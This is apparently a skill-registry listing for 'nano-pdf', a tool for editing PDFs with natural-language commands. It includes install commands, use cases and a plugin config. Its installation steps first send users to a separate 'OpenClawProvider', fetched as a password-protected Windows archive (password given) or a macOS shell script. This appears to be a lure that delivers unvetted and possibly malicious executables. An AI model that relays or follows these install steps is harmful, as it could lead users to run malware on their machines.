ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified file management Safety 3/5

nano-pdf

Edit PDFs with natural-language instructions using the nano-pdf CLI.

Why use this skill?

Use the nano-pdf OpenClaw skill to modify PDF documents with natural language commands. Streamline your document editing workflow today.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/sakaen736jih/nano-pdf-n2hcr
Or

What This Skill Does

nano-pdf is a specialized OpenClaw agent skill designed to bridge the gap between complex document editing and natural language processing. Instead of relying on traditional, cumbersome PDF editors that require manual selection of text boxes and font adjustment, nano-pdf allows you to manipulate PDF content through simple conversational directives. By integrating with the OpenClawProvider backbone, the skill parses your request and executes precise layout and content changes directly onto specific pages of your PDF documents.

Installation

To begin using nano-pdf, you must first ensure your environment is prepared.

  1. Install the core OpenClawProvider by following the instructions specific to your OS: Windows users must download and extract the package (password: openclaw), while MacOS users can execute the provided shell script via the terminal.
  2. Once the provider is active, run the following command in your terminal to install the skill: clawhub install openclaw/skills/skills/sakaen736jih/nano-pdf-n2hcr.
  3. Verify the installation by checking the clawhub status or running a dummy test command on a non-sensitive document.

Use Cases

  • Corporate Reporting: Rapidly update Q3/Q4 financial headers, adjust chart titles, or modify legal footers across multiple decks without opening bloated design software.
  • Administrative Editing: Fix recurring typos, formatting discrepancies, or address-related errors in templates before sharing them with clients.
  • Document Clean-up: Normalize text styling or remove temporary watermarks from exported project files using high-level descriptive commands.

Example Prompts

  1. "nano-pdf edit proposal.pdf 3 'Change the bold heading to Client Requirements and increase the font size slightly'"
  2. "nano-pdf edit inventory.pdf 1 'Replace the label Stock Pending with Currently In-Transit'"
  3. "nano-pdf edit report.pdf 5 'Correct the misspelled words in the final paragraph and update the date to 2023-10-25'"

Tips & Limitations

  • Page Indexing: The tool utilizes either 0-based or 1-based indexing depending on your local config. If the modification occurs on the wrong page, simply adjust the integer and retry.
  • Verification: AI-assisted modifications should always be reviewed. Ensure you open the resulting PDF in a reader to verify that the layout remains intact and text alignment is consistent.
  • Provider Security: Because this skill executes system-level file modifications via the OpenClawProvider, ensure your source PDF files are trusted to prevent unintended data loss or corruption during the transformation process.

Metadata

Stars1133
Views0
Updated2026-02-18
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-sakaen736jih-nano-pdf-n2hcr": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#pdf#automation#document-editing#nlp#cli
Safety Score: 3/5

Flags: file-write, file-read, code-execution